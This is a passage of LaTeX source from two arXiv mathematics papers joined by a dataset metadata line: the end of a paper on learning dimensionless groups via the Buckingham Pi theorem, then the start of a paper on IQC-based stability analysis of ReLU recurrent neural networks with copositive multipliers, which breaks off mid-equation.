This has the advantage of producing a simple number suitable for comparison to the classical result, but is not strictly necessary; the brute force search could be avoided with a constrained optimization approach as described in Sec.~\ref{sec:constrained-opt} and the boundary layer example in Sec.~\ref{sec:results-blasius}.
The optimal dimensionless number selected by the algorithm is the inverse of the Rayleigh number, $\pi_p = \mathrm{Ra}^{-1}$, with dimensionless time $\tau = t \kappa^2 / \alpha^2 \nu (\Delta T)^2 $.
The dynamics model is a normal form for a pitchfork bifurcation:
\begin{equation}
\mathrm{Ra}\dv{q}{\tau} = \left(\frac{\mathrm{Ra}}{\mathrm{Ra}_c} - 1 \right) q - \mu q^3,
\end{equation}
with estimated critical Rayleigh number $\mathrm{Ra}_c \approx 1878$, growth rate $\lambda \approx 1.7 \times 10^{-3}$ and Landau parameter $\mu \approx 4.6\times 10^{-5}$.
The fixed points of this model can be found easily and compared to the steady states of the simulation, as shown in Fig.~\ref{fig:sindy-RB}.
The model closely matches the steady states not only of the training, but also of the withheld test points much farther from the bifurcation (shown as red crosses).
Of course, this is a simple model of a well-understood instability, but the ability to directly derive normal forms from dimensional data opens the possibility of modeling more complex bifurcations, including cases where the control parameters are not well established.
\section{Discussion}
Finally, we've shown that data can be used to discover an ``optimal'' set of dimensionless numbers that honor the Buckingham Pi theorem according to hypothesis \ref{main-hyp}.
However, the definition of that optimality is non-unique, leaving the open question of how to find the best way to integrate the data with the Buckingham Pi theorem.
In particular, the methods introduced in Sec.~\ref{sec:methods} all seek to identify dimensionless groups for which the corresponding function approximation (KRR, BuckiNet, or SINDy) can best represent the input-output relationship $\bm \pi_q = \psi(\bm \pi_p)$.
Choosing a SINDy representation of this relationship encodes an inductive bias towards low-order polynomials, which is often appropriate in dynamical systems applications or asymptotic expansions.
In these contexts, the identified parameters are more likely to have a familiar structure, such as the ratio of different terms in a governing equation.
On the other hand, the optimal dimensionless parameters as seen by more flexible and general representations such as neural networks or kernel regression may be completely different than those derived by classical analytic approaches giving insight into scaling Pi-groups that cannot be derived by hand.
For instance, the Blasius solution cannot be easily represented with low-order polynomials, but at the cost of interpretability of the function, kernel regression is able to accurately model the boundary layer with the nonstandard nondimensionalization in equation~\eqref{eq:blasius-result}.
More generally, dimensional analysis is a commonly used method for physics discovery and characterization. Importantly, it highlights the fact that physical laws do not depend on any specific units of measurements. Rather, physical laws are fundamental and have the property of {\em generalized homogeneity}~\cite{barenblatt1996scaling}, thus they are independent of the observer. Advancements across scientific disciplines have used such concepts to develop governing equations, from gravitation to electromagnetism. Specifically, dimensionality reduction has identified critical symmetries, parametrizations, and bifurcation structures underlying a given model. As such, dimensionality reduction has always been a critical component of establishing the canonical models across disciplines. However, when encountering new physics-based systems where the governing equations are unknown or their parametrizations undetermined, dimensionality reduction once again is critical for determining, {\em the general form to which any physical equation is reducible}~\cite{buckingham1914physically}.
Edgar Buckingham provided the rigorous mathematical foundations on which dimensional analysis is accomplished. It is a constructive procedure which significantly constrains the space of hypothesized models. Although greatly constraining the allowable model space, Buckingham Pi theory does not produce a unique model, but rather a small subset of parametrizations which are then typically chosen from expert knowledge or asymptotic considerations~\cite{barenblatt1996scaling}. With modern machine learning, we have shown that the Buckingham Pi theory procedure can be automated to discovery a diversity of important physical features and properties. In particular, we have shown that depending on the objective, there are three distinct methods by which we can produce a model through dimensional analysis. Each method is framed as an optimization problem which either imposes hard, soft or no constraints on the null-space of the units matrix, or optimizes the robustness, accuracy and speed of the model selected. Specifically, we develop three data-driven techniques that use the Buckingham Pi theorem as a constraint: (i) a constrained optimization problem with a non-parametric input-output fitting function, (ii) a deep learning algorithm (BuckiNet) that projects the input parameter space to a lower dimension in the first layer, and (iii) a sparse identification of nonlinear dynamics (SINDy) based technique to discover dimensionless equations whose coefficients determine important features of the dynamics, such as inertia and bifurcations. Such regularizations solve the ill-posed nature of Buckingham Pi theory and its non-unique solution space. We demonstrated the application of each method on a set of well-known physics problems, showing that without any prior knowledge of the underlying physics, the various architectures are able to extract all the key concepts from the data alone.
The suite of algorithms introduced provide a set of physics-informed learning tools that can help characterize new systems and the underlying general form to which the physical system is reducible, regardless of whether governing equations are known or not. This includes extracting in an automated fashion, the system's symmetries, parametric dependencies and potential bifurcation parameters. Although modern machine learning can simply learn accurate representations of input and output relations, the imposition of Buckingham Pi theory allows for interpretable or explainable models. Explainable AI, especially in the context of physics-based systems, has grown in importance as it is imperative to understand the feature space on which modern AI empowered autonomy, for instance, makes decisions with guaranteed safety margins.
\section*{Acknowledgments}
The authors acknowledge support from the Army Research Office (ARO W911NF-19-1-0045) and the National Science Foundation AI Institute in Dynamic Systems (Grant No. 2112085).
JLC acknowledges funding support from the Department of Defense (DoD) through the National Defense Science \& Engineering Graduate (NDSEG) Fellowship Program.
\begin{spacing}{.9}
\small{
\setlength{\bibsep}{5.5pt}
\bibliographystyle{unsrt}
| 2024-02-18T23:40:02.022Z | 2022-02-11T02:00:07.000Z | algebraic_stack_train_0000 | 1,139 | 9,872 |
|
proofpile-arXiv_065-5656 | \section{Introduction}
\label{sec:intro}
A recurrent neural network (RNN) is a class of deep neural networks
and able to imitate the behavior of dynamical systems
due to its feedback mechanism.
The effectiveness of the RNN is widely recognized in speech recognition,
natural language processing, and image recognition
\cite{Barabanov_IEEENN2002,Zhang_IEEENN2014,Salehinejad_2018}.
Even though new architectures such as transformer \cite{Vaswani_NIPS2017}
have been developed recently, it is expected
that the RNN retains its position
as one of the fundamental and important elements in deep neural networks.
Even though the feedback mechanism is the key of the RNN
and distinguishes the RNN from other feedforward networks,
the existence of the feedback mechanism may cause network instability.
Therefore the stability analysis of the RNN has been an important issue
in the machine learning community
\cite{Barabanov_IEEENN2002,Zhang_IEEENN2014,Salehinejad_2018}.
From control theoretic viewpoint,
we can readily apply the small gain theorem \cite{Khalil_2002}
to the stability analysis of a given RNN by representing it
as a feedback connection with a linear time-invariant (LTI) system and
a static nonlinear activation function typically being
a rectified linear unit (ReLU) for the RNN.
It is nonetheless true that the standard small gain theorem leads to
conservative results
since it does not take into account the important property that
the ReLU returns only nonnegative signals.
This motivated us to analyze the $l_2$ induced norm of LTI systems
for nonnegative input signals in \cite{Ebihara_EJC2021},
which is referred to as the $l_{2+}$ induced norm in this paper.
We characterized an upper bound of
the $l_{2+}$ induced norm
by copositive programming \cite{Dur_2010}, and then
derived a numerically tractable semidefinite program (SDP)
for (in general loosened) upper bound computation.
We finally derived an $l_{2+}$-induced-norm-based
(scaled) small gain theorem for the stability analysis of the RNN and
illustrated its effectiveness by numerical examples.
We believe that the treatments in \cite{Ebihara_EJC2021}
brought some new insights for the stability analysis of
feedback systems constructed from LTI systems and
nonlinear elements (i.e., Lur'e systems).
However, the $l_{2+}$-induced-norm-based (scaled) small gain condition
might be shallow in view of
the advanced integral quadratic constraint (IQC) theory \cite{Megretski_IEEE1997}.
We acknowledge the fact that, for the stability analysis of Lur'e systems,
the effectiveness of
the IQC-based approaches with Zames-Falb multipliers \cite{Zames_SIAM1968}
are widely recognized, see, e.g., \cite{Fetzler_IFAC2017,Fetzler_IJRN2017}.
Therefore it is strongly preferable if we can build the nonnegativity-based approach
upon the powerful IQC-based framework.
Such an extension seems hard, since, as the denomination IQC says,
the existing multipliers capture the properties of nonlinear elements
with {\it quadratic} constraints on their input-output signals,
whereas the nonnegativity property of the RNN (i.e., ReLU) is essentially
{\it linear} constraints on the input-output signals.
To get around this difficulty,
we loosen the standard positive semidefinite cone to the copositive cone
and employ copositive multipliers to handle
the linear (nonnegativity) constraints on the input-output signals of the RNN.
As clarified later on, this can be done in such a sound way that
the proposed IQC-based stability condition with the copositive multipliers
encompasses the results in \cite{Ebihara_EJC2021} as particular cases.
Then, by applying an inner approximation to the copositive cone,
we derive numerically tractable IQC-based SDPs for the stability analysis of the RNN.
We show that, within the framework of IQC,
we can employ copositive multipliers (or their inner approximation)
together with existing multipliers such as
the Zames-Falb multipliers and polytopic bounding multipliers,
and this directly enables us to ensure that the introduction of
the copositive multipliers leads to better (no more conservative) results.
We finally illustrate the effectiveness of
the IQC-based stability conditions with the copositive multipliers
by using the same numerical examples as in \cite{Ebihara_EJC2021}.
Related works include \cite{Anderson_IEEENN2007,Yin_IEEE2021,Fazlyab_IEEE2021,Revay_LCSS2021}, but
again the novel contribution of the present paper is
capturing the behavior of ReLUs by
copositive multipliers within the framework of IQCs.
Notation:
The set of $n\times m$ real matrices is denoted by $\bbR^{n\times m}$, and
the set of $n\times m$ entrywise nonnegative matrices is denoted
by $\bbR_+^{n\times m}$.
For a matrix $A$, we also write $A\geq 0$ to denote that
$A$ is entrywise nonnegative.
We denote the set of $n\times n$ real symmetric matrices by $\bbS^n$.
For $A\in\bbS^n$, we write $A\succ 0\ (A\prec 0)$ to
denote that $A$ is positive (negative) definite.
For $A\in\bbR^{n\times n}$, we define $\He\{A\}:=A+A^T$.
For $A\in\bbR^{n\times n}$ and $B\in\bbR^{n\times m}$,
$(\ast)^TAB$ is a shorthand notation of $B^TAB$.
We denote by $\bbD_{++}^n\subset\bbR^{n\times n}$ the set of diagonal matrices
with strictly positive diagonal entries.
In addition, we denote by $\bbD^n[\alpha,\beta]$
the set of diagonal matrices whose diagonal entries are all within
the closed interval $[\alpha,\beta]$.
Moreover, $\bbD_\mathrm{ver}^n[\alpha,\beta]\subset \bbD^n[\alpha,\beta]$
is the set of $2^n$ matrices corresponding to the vertices of $\bbD^n[\alpha,\beta]$.
A matrix $M\in\bbR^{n\times n}$ is said to be
Z-matrix if $M_{ij}\le 0$ for all $i\neq j$.
Moreover, $M$ is said to be doubly hyperdominant if
it is a Z-matrix and
$M \one_n \ge 0$, $\one_n^T M \ge 0$,
where $\one_n\in\bbR^n$ stands for the all-ones-vector.
In this paper we denote by $\DHD^n\subset \bbR^{n\times n}$ the set of
doubly hyperdominant matrices.
For the discrete-time signal $w$ defined
over the time interval $[0,\infty)$, we define
\[
\begin{array}{@{}l}
\|w\|_{2}:=\sqrt{\sum_{k=0}^{\infty}|w(k)|_2^2}
\end{array}
\]
where for $v\in\bbR^{n_v}$ we define
$|v|_2:=\sqrt{\sum_{j=1}^{n_v} v_j^2}$.
We also define
\[
\begin{array}{@{}l}
l_{2} :=\left\{w:\ \|w\|_{2}<\infty \right\},\\
l_{2+} :=\left\{w:\ w\in l_{2},\ w(k)\ge 0\ (\forall k\ge 0)\right\}
\end{array}
\]
and
\[
\begin{array}{@{}l}
l_{2e} :=\left\{w:\ w_\tau\in l_2,\ \forall \tau\in[0,\infty) \right\}
\end{array}
\]
where $w_\tau$ is the truncation of the signal $w$ up to the time instant
$\tau$
and defined by
\[
w_\tau(k)=
\left\{
\begin{array}{cc}
w(k)& (k\le \tau), \\
0& (k> \tau). \\
\end{array}
\right.
\]
For an operator $H:\ l_{2e}\ni w \to z \in l_{2e}$,
we define its (standard) $l_2$ induced norm by
\begin{equation}
\|H\|_{2}:=\sup_{w\in l_2,\ \|w\|_2=1} \ \|z\|_2.
\label{eq:l2norm}
\end{equation}
We also define
\begin{equation}
\|H\|_{2+}:=\sup_{w\in l_{2+},\ \|w\|_2=1} \ \|z\|_2.
\label{eq:l2+norm}
\end{equation}
This is a variant of the $l_2$ induced norm introduced in \cite{Ebihara_EJC2021}
and referred to as the $l_{2+}$ induced norm in this paper.
We can readily see that $\|H\|_{2+}\le \|H\|_{2}$.
\section{Copositive Programming}
\label{sec:cop}
Copositive programming (COP) is a convex optimization problem in which
we minimize a linear
objective function over the
linear matrix inequality (LMI) constraints on the copositive cone
\cite{Dur_2010}.
In this section, we summarize its basics.
\subsection{Convex Cones Related to COP}
Let us review the definition and the property of convex
cones related to COP.
\begin{definition}\cite{Berman_2003}\label{conedef}
The definition of proper cones
$\PSD_n$, $\COP_n$, $\CP_n$, $\NN_n$, and $\DNN_n$ in
$\bbS^n$ are as follows.
\begin{enumerate}
\item
$\PSD_n:=\{P\in\bbS^n:\ \forall x\in\bbR^n,\
x^TPx\geq 0\}=\{P\in\bbS^n:\ \exists B\
\mbox{s.t.}\ P=BB^T\}$ is called {\it the positive semidefinite cone}.
\item
$\COP_n:=\{P\in\bbS^n:\ \forall x\in\bbR_{+}^n,\
x^TPx\geq 0\}$ is called {\it the copositive cone}.
\item
$\CP_n:=\{P\in\bbS^n:\ \exists B\ge 0\
\mbox{s.t.}\ P=BB^T\}$ is called {\it the completely positive cone}.
\item
$\NN_n:=
\{P\in\bbS^n:\ P\geq 0\}
$
is called {\it the nonnegative cone}.
\item
$\PSD_n+\NN_n:=\{P+Q:\ P\in\PSD_n,\
Q\in\NN_n\}$.
This is the Minkowski sum of the positive semidefinite cone and
the nonnegative cone.
\item
$\DNN_n:=\PSD_n\cap\NN_n$ is called
{\it the doubly nonnegative cone}.
\end{enumerate}
\end{definition}
From Definition \ref{conedef},
we clearly see that the following inclusion relationships hold:
\begin{equation}
\CP_n\subset\DNN_n\subset\PSD_n\subset\PSD_n+\NN_n\subset\COP_n,
\label{eq:inc1}
\end{equation}
\begin{equation}
\CP_n\subset\DNN_n\subset\NN_n\subset\PSD_n+\NN_n\subset\COP_n.
\label{eq:inc2}
\end{equation}
In particular, when $n\leq 4$, it is known that
$\COP_n=\PSD_n
+\NN_n$ and $\CP_n =\DNN_n$ hold \cite{Berman_2003}.
On the other hand, as for the duality of these cones,
$\COP_n$ and $\CP_n$ are dual to each other,
$\PSD_n+\NN_n$ and $\DNN_n$ are dual to each other,
and $\PSD_n$ and $\NN_n$ are self-dual.
It is also well known that the interior of the cone $\PSD_n$ can be
characterized by
\[
\begin{array}{@{}lcl}
\PSD_n^\circ&=&\{P\in\bbS^n:\ \forall
x\in\bbR^n\backslash\{0\},\ x^TPx>0\}\\
&=&
\{P\in\bbS^n:\ \exists B\ \mbox{s.t.}\ P=BB^T,\
\mathrm{rank}(B)=n\}.
\end{array}
\]
\subsection{Basic Properties of COP}
COP is a convex optimization problem on the copositive cone and
its dual is a convex optimization problem on the completely positive cone.
As mentioned in \cite{Dur_2010},
the problem to determine whether a given symmetric matrix is
copositive or not is a co-NP complete problem, and
the problem to determine whether a given symmetric matrix is
completely positive or not is an NP-hard problem.
Therefore, it is hard to solve COP
numerically in general.
However, since the problem to determine whether a given matrix is in $\PSD+\NN$
or in $\DNN$ can readily be reduced to SDPs,
we can numerically solve the convex optimization problems on the cones
$\PSD+\NN$ and $\DNN$ easily.
Moreover, when $n\leq 4$, it is known that $\COP_n=\PSD_n+\NN_n$ and
$\CP_n=\DNN_n$ as stated above,
and hence those COPs with $n\leq 4$ can be reduced to SDPs.
\section{IQC-Based Stability Analysis of RNN with ReLU}
\label{sec:RNN}
\subsection{Basics of RNN and Stability}
\label{sub:RNN}
Let us consider the dynamics of
the discrete-time RNNs typically described by
\begin{equation}
G:\ \left\{
\arraycolsep=0.5mm
\begin{array}{ccl}
x(k+1)&=&\Lambda x(k)+\Win w(k)+v(k),\\
z(k)&=&\Wout x(k),\\
w(k)&=&\Phi(z(k)+s(k)).
\end{array}
\right.
\label{eq:RNN}
\end{equation}
Here $x\in\bbR^n$ is the state and
$\Lambda\in\bbR^{n\times n}$,
$\Wout\in\bbR^{m\times n}$,
$\Win\in\bbR^{n\times m}$ are constant matrices
with $\Lambda$ being Schur-Cohn stable.
We assume $x(0)=0$.
On the other hand, note that
$s:\ [0,\infty)\to \bbR^m$ and $v:\ [0,\infty)\to \bbR^n$ are
external input signals
and $\Phi:\ \bbR^m\to \bbR^m$ is the
static activation function typically being nonlinear.
The matrices $\Win$ and $\Wout$ are constructed from
the weightings of the edges in RNN.
In this paper, we consider the typical case where the activation function is
the (entrywise)
rectified linear unit (ReLU) whose input-output property is given by
\begin{equation}
\begin{array}{@{}l}
\Phi(\xi)=\left[\ \phi(\xi_1)\ \cdots\ \phi(\xi_m)\ \right]^T,\\
\phi: \bbR\to \bbR,\quad
\phi(\eta)=
\left\{
\begin{array}{cc}
\eta & (\eta\ge 0), \\
0 & (\eta< 0). \\
\end{array}
\right.
\end{array}
\label{eq:ReLU}
\end{equation}
We can readily see that $\|\Phi\|_2=1$.
It should be noted that
the system $G_0$
essentially makes the feedback loop with
the ReLU $\Phi$ where
\begin{equation}
G_0:=
\left[
\begin{array}{c|c}
\Lambda & \Win \\ \hline
\Wout & 0
\end{array}
\right].
\label{eq:G0}
\end{equation}
Since here we are dealing with nonlinear systems,
it is of prime importance to clarify the definition of
``stability.''
The definition we employ for the analysis of RNN is as follows.
\begin{definition}\cite{Khalil_2002} (Finite Gain $l_2$ Stability)
An operator $H:\ l_{2e}\ni u \to y\in l_{2e}$
is said to be finite gain $l_2$ stable
if there exists a nonnegative constant $\gamma$ such that
$\|y_\tau\|_2 \le \gamma \|u_\tau\|_2$ holds
for any $u \in l_{2e}$ and $\tau \in [0,\infty)$.
\end{definition}
In the following, we analyze the
finite gain $l_2$ stability of the operator in RNN
with respect to
the input $[\ s^T\ v^T\ ]^T\in l_{2e}$
and the output $[\ z^T\ w^T\ ]^T \in l_{2e}$.
Note that the feedback connection in the RNN
is well-posed since its dynamics is given by the state-space equation
\rec{eq:RNN}.
We also note that we implicitly use the causality of $G$ and $\Phi$
in the following.
\subsection{IQC-Based Basic Stability Condition}
It is known that the framework of
Integral Quadratic Constraint (IQC) \cite{Megretski_IEEE1997} is helpful
in capturing the nonlinearity in feedback systems and
obtaining less conservative results for stability analysis.
The basic IQC-based stability condition
for RNN with ReLU can be summarized by the next theorem.
\begin{theorem}
For any input signal $\xi\in\l_{2e}$ and
output signal $\zeta\in l_{2e}$
of ReLU $\Phi$ such that $\zeta=\Phi \xi$,
suppose $\Pi\in\bbS^{2m}$ satisfies
the time-domain
(discrete-time version of) IQC given by
\begin{equation}
\sum_{k=0}^\tau
\left[
\begin{array}{c}
\xi(k) \\
\zeta(k) \\
\end{array}
\right]^T
\Pi
\left[
\begin{array}{c}
\xi(k) \\
\zeta(k) \\
\end{array}
\right]\ge 0
\label{eq:IQC0}
\end{equation}
for any $\tau\in[0,\infty)$.
Then, the RNN given by \rec{eq:RNN}
with ReLU $\Phi$ given by \rec{eq:ReLU}
is finite-gain $l_2$ stable if there exist
$P\in\PSD_n$ and
$S\in\bbD_{++}^m$ such that
\begin{equation}
\scalebox{0.95}{$
\begin{array}{@{}l}
\left[
\begin{array}{cc}
-P & 0 \\
0 & -S
\end{array}
\right]+
\left[
\begin{array}{cc}
\Lambda & \Win \\
\Wout & 0\\
\end{array}
\right]^T
\left[
\begin{array}{cc}
P & 0\\
0 & S\\
\end{array}
\right]
\left[
\begin{array}{cc}
\Lambda & \Win \\
\Wout & 0\\
\end{array}
\right]\\
\hspace*{5mm}
+
\left[
\begin{array}{cc}
\Wout & 0 \\
0 & I_m \\
\end{array}
\right]^T\Pi
\left[
\begin{array}{cc}
\Wout & 0 \\
0 & I_m \\
\end{array}
\right]
\prec 0.
\end{array}$}
\label{eq:RNNIQC}
\end{equation}
\label{th:IQC}
\end{theorem}
\begin{proofof}{\rth{th:IQC}}
Suppose \rec{eq:RNNIQC} holds with
$P=\hatP\in \PSD_n$ and
$S=\hatS\in \bbD_{++}^m$.
Then, it is very clear that there exist
$\varepsilon>0$ and $\nu>0$ such that
\[
\scalebox{0.95}{$
\begin{array}{@{}l}
M(\hatP,\varepsilon,\nu)\prec 0,\ \mbox{with}\\
M(\hatP,\varepsilon,\nu):=
\arraycolsep=0.3mm
\left[
\begin{array}{cccc}
-\hatP+\varepsilon^2 \Wout^T\Wout & 0 & 0 & 0 \\
0 & -\hatS & 0 & 0 \\
0 & 0 & -\nu^2 I_n& 0 \\
0 & 0 & 0 &-\nu^2 I_m \\
\end{array}
\right]\\
\arraycolsep=0.3mm
+(\ast)^T
\left[
\begin{array}{cc}
\hatP & 0\\
0 & \hatS\\
\end{array}
\right]
\left[
\begin{array}{cccc}
\Lambda & \Win & I_n & 0 \\
\Wout & 0 & 0 & I_m\\
\end{array}
\right]
+(\ast)^T
\Pi
\left[
\begin{array}{cccc}
\Wout & 0 & 0 & I_m \\
0 & I_m & 0 & 0 \\
\end{array}
\right].
\end{array}$}
\]
Then, along the trajectory of the RNN
for the input signals $v\in l_{2e}$ and $s\in l_{2e}$,
we have
\[
\left[
\begin{array}{c}
x(k)\\
w(k)\\
v(k)\\
s(k)\\
\end{array}
\right]^T
M(\hatP,\varepsilon,\nu)
\left[
\begin{array}{c}
x(k)\\
w(k)\\
v(k)\\
s(k)\\
\end{array}
\right]
\le 0\ (k=0,1,\cdots)
\]
or equivalently,
\[
\begin{array}{@{}l}
\varepsilon^2 z(k)^Tz(k)-x(k)^T\hatP x(k)+x(k+1)^T\hatP x(k+1)\\
+(z(k)+s(k))^T\hatS(z(k)+s(k))-w(k)^T\hatS w(k)\\
-\nu^2 v(k)^Tv(k)-\nu^2 s(k)^Ts(k)\\
+\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right]^T
\Pi
\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right] \le 0\\
(k=0,1,\cdots).
\end{array}
\]
Here, since $\|\Phi\|_2 = 1$ and $\hatS\in\bbD_{++}^m$, we have
\[
(z(k)+s(k))^T\hatS (z(k)+s(k))-w(k)^T\hatS w(k)\ge 0
\]
and hence
\[
\begin{array}{@{}l}
\varepsilon^2 z(k)^Tz(k)-x(k)^T\hatP x(k)+x(k+1)^T\hatP x(k+1)\\
-\nu^2 v(k)^Tv(k)-\nu^2 s(k)^Ts(k)\\
+
\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right]^T
\Pi
\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right] \le 0\\
(k=0,1,\cdots).
\end{array}
\]
By summing up the above inequality up to $k=\tau$,
we have
\[
\scalebox{0.82}{$
\begin{array}{@{}l}
x(\tau+1)^T\hatP x(\tau+1)
+\varepsilon^2\sum_{k=0}^\tau |z(k)|_2^2
-\nu^2 \left(\sum_{k=0}^\tau |v(k)|_2^2+ \sum_{k=0}^\tau |s(k)|_2^2\right)\\
\renewcommand{\arraystretch}{0.90}
+ \sum_{k=0}^\tau
\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right]^T
\Pi
\left[
\begin{array}{c}
z(k)+s(k) \\
w(k) \\
\end{array}
\right] \le 0.
\end{array}$}
\]
Since $\hatP\in\PSD_n$ and since \rec{eq:IQC0} holds,
we can readily conclude from the above inequality that
\[
\|z_\tau\|_2^2 \le \frac{\nu^2}{\varepsilon^2}
\left(\|v_\tau\|_2^2+ \|s_\tau\|_2^2 \right)
\]
or equivalently,
\[
\renewcommand{\arraystretch}{0.90}
\|z_\tau\|_2 \le \frac{\nu}{\varepsilon}
\left\|
\left[
\begin{array}{c}
s_\tau\\
v_\tau
\end{array}\right]
\right\|_2.
\]
With this inequality and
\[
\renewcommand{\arraystretch}{0.95}
\begin{array}{@{}lcl}
\|w_\tau\|_{2} &=& \|(\Phi (z+s))_\tau\|_2\\
&=& \|\Phi (z+s)_\tau\|_2\\
&\le& \|\Phi\|_2 (\|z_\tau\|_2+\|s_\tau\|_2)\\
&=& \|z_\tau\|_2+\|s_\tau\|_2,
\end{array}
\]
we arrive at the conclusion that
\[
\begin{array}{@{}lcl}
\renewcommand{\arraystretch}{0.90}
\left\|
\left[
\begin{array}{c}
z_\tau\\
w_\tau
\end{array}\right]
\right\|_2\le
\sqrt{\frac{\nu^2}{\varepsilon^2}+2} \left\|
\left[
\begin{array}{c}
s_\tau\\
v_\tau
\end{array}\right]
\right\|_2
\end{array}
\]
holds for any $v\in l_{2e}$, $s\in l_{2e}$ and $\tau\in[0,\infty)$.
This completes the proof.
\end{proofof}
\begin{remark}
Since $G_0$ defined in \rec{eq:G0}
makes the feedback loop with $\Phi$,
and since $\| \Phi\|_2=1$,
it is very clear that
the small gain condition $\|G_0\|_2<1$ is a
sufficient condition for the stability of the RNN with the ReLU.
In addition, it is not hard to see that the ReLU $\Phi$ satisfies
$\Phi(\xi)=(D^{-1}\Phi D)(\xi)$ for any
$D\in\bbD_{++}^{n}$.
Therefore the scaled small gain condition
$\|D^{-1}G_0D\|_{2}< 1$ with $D\in\bbD_{++}^{n}$
is also a sufficient condition for the stability.
It should be noted that \rec{eq:RNNIQC} with $\Pi=0$
corresponds to the scaled small gain condition,
and that \rec{eq:RNNIQC} with $\Pi=0$ and $S=I_m$
corresponds to the small gain condition \cite{Khalil_2002}.
In this sense, the IQC-based stability condition in
\rth{th:IQC} encompasses these basic stability conditions.
\end{remark}
\section{Concrete Multipliers Capturing the Properties of ReLU}
\subsection{Zames-Falb Multiplier}
In this section, we summarize the arguments of
\cite{Fetzler_IFAC2017} on the discrete-time
Zames-Falb multipliers \cite{Zames_SIAM1968}.
By following \cite{Fetzler_IFAC2017}, we first introduce the following definitions.
\begin{definition}\cite{Fetzler_IFAC2017}
Let $\mu\le 0 \le \nu$.
Then the nonlinearity $\phi:\ \bbR\to\bbR$ is slope-restricted,
in short $\phi \in \slope(\mu,\nu)$, if $\phi(0)=0$ and
\[
\mu\leq \dfrac{\phi(x)-\phi(y)}{x-y}
\le
\sup_{x\neq y}\dfrac{\phi(x)-\phi(y)}{x-y}
<\nu
\]
for all $x,y\in\bbR$, $x\neq y$.
On the other hand, the nonlinearity $\phi$ is said to be sector-bounded if
\[
(\phi(x)-\alpha x)(\phi(x)-\beta x)\leq 0
\ (\forall x\in\bbR)
\]
for some $\alpha \le 0 \le \beta$.
This is expressed as $\phi\in\sec[\alpha,\beta]$.
\end{definition}
The main result of \cite{Fetzler_IFAC2017}
on the discrete-time Zames-Falb multipliers
for slope-restricted nonlinearities can be
summarized by the next lemma.
\begin{lemma}\cite{Fetzler_IFAC2017}
For a given nonlinearity $\phi\in \slope(\mu,\nu)$ with
$\mu\le 0\le \nu$,
let us define $\Phi:\ \bbR^m\to \bbR^m$
by the first equation in \rec{eq:ReLU}.
Assume $M\in\DHD^m$. Then we have
\[
\scalebox{0.93}{$
\begin{array}{@{}l}
(\ast)^T
\left[
\begin{array}{cc}
0 & M^T\\
M & 0
\end{array}
\right]
\left(
\left[
\begin{array}{cc}
\nu I_m & -I_m\\
-\mu I_m & I_m\\
\end{array}
\right]
\left[
\begin{array}{c}
x\\
\Phi(x)
\end{array}
\right]\right)\ge 0\ \forall x \in\bbR^m.
\end{array}$}
\]
\label{le:sl}
\end{lemma}
From this key lemma and the fact that the ReLU $\phi:\ \bbR\to\bbR$
satisfies $\phi\in\slope(0,1)$,
we can obtain the next result on
the Zames-Falb multiplier for the ReLU given by \rec{eq:ReLU}.
\begin{corollary}
Let us define
\begin{equation}
\scalebox{0.75}{$
\begin{array}{@{}l}
\arraycolsep=0.5mm
\PiZF:=
\left\{
\Pi\in\bbS^{2m}:\
\Pi=
(\ast)^T
\left[
\begin{array}{cc}
0 & M^T\\
M & 0
\end{array}
\right]
\left[
\begin{array}{cc}
I_m & -I_m\\
0 & I_m\\
\end{array}
\right],\ M\in \DHD^m \right\}.
\end{array}$}
\label{eq:MZF}
\end{equation}
Then, $\Pi\in \PiZF$ is a valid multiplier that satisfies \rec{eq:IQC0}
for the ReLU $\Phi$ given by \rec{eq:ReLU}.
\label{cor:ZF}
\end{corollary}
\subsection{Polytopic Bounding Multiplier}
The polytopic bounding multipliers are useful
to capture the properties of sector-bounded nonlinearities.
To represent them in compact fashion, let us define
\begin{equation}
\scalebox{0.85}{$
\begin{array}{@{}l}
\arraycolsep=0.1mm
\Pispol[\alpha,\beta]:=
\left\{
\Pi \in \bbS^{2m}:\
(\ast)^T \Pi
\left[
\begin{array}{c}
I \\
\Delta
\end{array}
\right]\succ 0\ \forall \Delta \in \bbD^n[\alpha,\beta]
\right\}.
\end{array}$}
\label{eq:Pipol0}
\end{equation}
Then the following lemma provides
the polytopic bounding multipliers for sector-bounded nonlinearities.
\begin{lemma}\cite{Fetzler_IFAC2017}
For a given nonlinearity $\phi\in \sec[\alpha,\beta]$ with
$\alpha\le 0\le \beta$,
let us define $\Phi:\ \bbR^m\to \bbR^m$
by the first equation in \rec{eq:ReLU}.
Assume $\Pi\in\Pispol[\alpha,\beta]$.
Then we have
\[
(\ast)^T
\Pi
\left[
\begin{array}{c}
x\\
\Phi(x)
\end{array}
\right]\ge 0\ \forall x \in\bbR^m.
\]
\label{le:sb}
\end{lemma}
As also stated in \cite{Fetzler_IFAC2017},
it is hard to check whether $\Pi\in\Pispol[\alpha,\beta]$ holds
since $\Pispol[\alpha,\beta]$ is characterized by infinitely many constraints.
To get around this difficulty, we employ a primitive but numerically tractable
inner approximation of $\Pispol[\alpha,\beta]$ given as follows:
\begin{equation}
\scalebox{0.9}{$
\begin{array}{@{}l}
\arraycolsep=0.3mm
\Pipol[\alpha,\beta]:=
\left\{
\Pi =
\left[
\begin{array}{cc}
X & Y \\
Y^T & Z
\end{array}
\right]
\in \bbS^{2m}:\right.\\ \left.
\arraycolsep=0.3mm
(\ast)^T \Pi
\left[
\begin{array}{c}
I \\
\Delta
\end{array}
\right]\succ 0\ \forall \Delta \in \bbD_\mathrm{ver}^n[\alpha,\beta],\
Z_{ii}\le 0\ (i=1,\cdots,m)
\right\}. \hspace*{-20mm}
\end{array}$}
\label{eq:Pipol}
\end{equation}
From this inner approximation and the fact that
the ReLU $\phi:\ \bbR\to\bbR$
satisfies $\phi\in\sec[0,1]$,
we can obtain the next result that provides
the polytopic bounding multiplier for the ReLU given by \rec{eq:ReLU}.
\begin{corollary}
Let us define
\begin{equation}
\scalebox{0.9}{$
\begin{array}{@{}l}
\arraycolsep=0.5mm
\Pipol:=
\left\{
\Pi =
\left[
\begin{array}{cc}
X & Y \\
Y^T & Z
\end{array}
\right]
\in \bbS^{2m}:\right.\\ \left.
(\ast)^T \Pi
\left[
\begin{array}{c}
I \\
\Delta
\end{array}
